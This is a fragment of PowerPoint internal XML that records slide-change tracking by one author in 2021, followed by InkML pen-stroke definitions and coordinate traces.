        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2323005149" sldId="296"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:37:03.685" v="5541" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3270382550" sldId="297"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:35:52.122" v="5531"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3270382550" sldId="297"/>
            <ac:spMk id="2" creationId="{1F82ACF9-D1E7-4485-8FBA-B3504176497B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:20:56.809" v="5389" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3270382550" sldId="297"/>
            <ac:spMk id="3" creationId="{0B0DA095-D1FD-42BB-A835-131264272D9A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:37:03.685" v="5541" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3270382550" sldId="297"/>
            <ac:graphicFrameMk id="4" creationId="{237EC7B3-6331-44CF-8576-66CC078FC3CB}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:50:41.781" v="5564" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="790591655" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:29:46.179" v="5503" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="790591655" sldId="298"/>
            <ac:spMk id="2" creationId="{1651654B-D39E-4D91-BD2D-F36F25B1631B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:50:41.781" v="5564" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="790591655" sldId="298"/>
            <ac:graphicFrameMk id="3" creationId="{3EEDFAAC-96FA-4499-B52C-7EEC83C95846}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:50:20.148" v="5563" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="21390998" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:49:24.781" v="5553" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="21390998" sldId="299"/>
            <ac:spMk id="5" creationId="{E5D9DA2C-E719-47EB-9FD1-6CC933D53066}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:49:25.185" v="5555"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="21390998" sldId="299"/>
            <ac:spMk id="6" creationId="{2F018B62-DAD7-45D5-9AB6-892898CCA73F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:50:20.148" v="5563" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="21390998" sldId="299"/>
            <ac:spMk id="8" creationId="{383CD633-8509-4762-86AB-06FAAFCFCBF7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-18T23:47:46.385" v="5542" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="21390998" sldId="299"/>
            <ac:picMk id="3" creationId="{7A4CD8B8-63A4-4972-9381-8C8BF4877BAF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg modClrScheme setClrOvrMap chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:37:28.127" v="5696" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1138979085" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:37:28.127" v="5696" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="2" creationId="{EF68018D-0A86-4236-91B1-9F8F8EFDB9D9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="3" creationId="{3477329C-63A2-4037-A844-D0A69377FA86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.935" v="5684" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="11" creationId="{799A8B4F-0FED-46C0-9186-5A8E116D8744}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.935" v="5684" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="15" creationId="{38A69B74-22E3-47CC-823F-18BE7930C814}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.935" v="5684" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="17" creationId="{1778637B-5DB8-4A75-B2E6-FC2B1BB9A7DB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.935" v="5684" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="19" creationId="{0035A30C-45F3-4EFB-B2E8-6E2A11843D39}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="21" creationId="{003713C1-2FB2-413B-BF91-3AE41726FB7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="22" creationId="{90795B4D-5022-4A7F-A01D-8D880B7CDBE6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="23" creationId="{AFD19018-DE7C-4796-ADF2-AD2EB0FC0D9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:spMk id="24" creationId="{B1A0A2C2-4F85-44AF-8708-8DCA4B550CB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:picMk id="4" creationId="{59C0223F-68D6-4349-A391-DCBDAE966740}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:picMk id="5" creationId="{A30EB288-5FBD-4E0B-919A-31CA05F5BBAE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.947" v="5685" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:picMk id="6" creationId="{C5D97573-CB53-4451-9CF0-E8DFB921EC8A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:25:06.935" v="5684" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1138979085" sldId="300"/>
            <ac:picMk id="13" creationId="{DA6861EE-7660-46C9-80BD-173B8F7454B8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:27:58.083" v="5689" actId="26606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2250649236" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:27:23.476" v="5686" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2250649236" sldId="301"/>
            <ac:spMk id="2" creationId="{671721A4-6A61-438A-87E1-AC10AE1D4580}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:27:23.476" v="5686" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2250649236" sldId="301"/>
            <ac:spMk id="3" creationId="{6CDFB108-68AC-4983-AD19-25431AB01ED3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:27:58.083" v="5689" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2250649236" sldId="301"/>
            <ac:spMk id="10" creationId="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:27:58.083" v="5689" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2250649236" sldId="301"/>
            <ac:picMk id="5" creationId="{767ACCE0-0107-4DFC-B47F-D7FA29D9FDE3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:44:16.694" v="5837" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3209152045" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:42:40.735" v="5765" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209152045" sldId="302"/>
            <ac:spMk id="4" creationId="{7EFB65DE-390F-4EE3-B471-6C51C7FEAB19}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:44:16.694" v="5837" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209152045" sldId="302"/>
            <ac:spMk id="7" creationId="{55B24B1D-D05F-4FB2-A2E5-367A93645CCF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:42:40.735" v="5765" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209152045" sldId="302"/>
            <ac:picMk id="3" creationId="{9D9C565C-E3E3-4EEC-B921-B64B68655B72}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:43:35.725" v="5771" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209152045" sldId="302"/>
            <ac:picMk id="6" creationId="{4DAB43ED-628E-48BA-94AF-22775E295B1B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-19T01:43:40.700" v="5773" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209152045" sldId="302"/>
            <ac:picMk id="9" creationId="{05535DA1-BC2F-47B1-97B4-597880497A06}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:50.152" v="45" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="53763807" sldId="304"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:43.730" v="11" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4015681537" sldId="316"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:43.944" v="12" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3632309167" sldId="317"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:44.244" v="14" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1212472519" sldId="323"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:44.780" v="16" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1474958626" sldId="324"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:45.338" v="17" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="953707264" sldId="325"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:45.379" v="18" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4066713324" sldId="326"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:45.460" v="20" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1895418146" sldId="327"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:45.946" v="23" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1077324671" sldId="328"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:45.556" v="21" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4060086368" sldId="329"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:49.385" v="41" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3192494774" sldId="330"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:49.578" v="42" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2786836983" sldId="331"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{27FAE7C2-98C3-4F90-970B-CFC2B878BAA9}" dt="2021-03-15T12:32:49.780" v="43" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3230497500" sldId="333"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{C7EBDA7E-D839-430F-88A7-B1A8D85ABB6A}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{C7EBDA7E-D839-430F-88A7-B1A8D85ABB6A}" dt="2021-06-21T20:10:29.233" v="1" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{C7EBDA7E-D839-430F-88A7-B1A8D85ABB6A}" dt="2021-06-21T20:10:29.233" v="1" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1323245308" sldId="256"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{C7EBDA7E-D839-430F-88A7-B1A8D85ABB6A}" dt="2021-06-21T20:10:29.233" v="1" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:picMk id="4" creationId="{73C2B94F-CA81-429B-AA4B-3D57017F2C9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35.947"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">180 1 24575,'-1'4'0,"0"0"0,1 0 0,-2-1 0,1 1 0,0 0 0,-1 0 0,0-1 0,1 1 0,-2-1 0,1 1 0,-4 4 0,-35 38 0,31-35 0,2-3 0,0 0 0,0 1 0,1 0 0,0 0 0,1 1 0,0 0 0,0 0 0,1 1 0,1-1 0,0 1 0,0 0 0,1 0 0,0 1 0,1-1 0,-2 22 0,3-13 0,-1 0 0,-5 20 0,3-19 0,-3 35 0,7-49 0,0 0 0,0-1 0,1 1 0,-1-1 0,1 1 0,1-1 0,-1 1 0,6 11 0,-6-15 0,1 0 0,0-1 0,-1 1 0,1-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,6 2 0,106 18 0,-111-20-195,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,6-2 0,4-2-6631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29:44.620"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 62 24575,'14'0'0,"-6"1"0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0-1 0,0-1 0,0 1 0,9-7 0,-8 5 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,1 0 0,0 1 0,-1 0 0,15 0 0,14 1 0,43 3 0,-21 1 0,-4-3-1365,-32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29:47.525"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
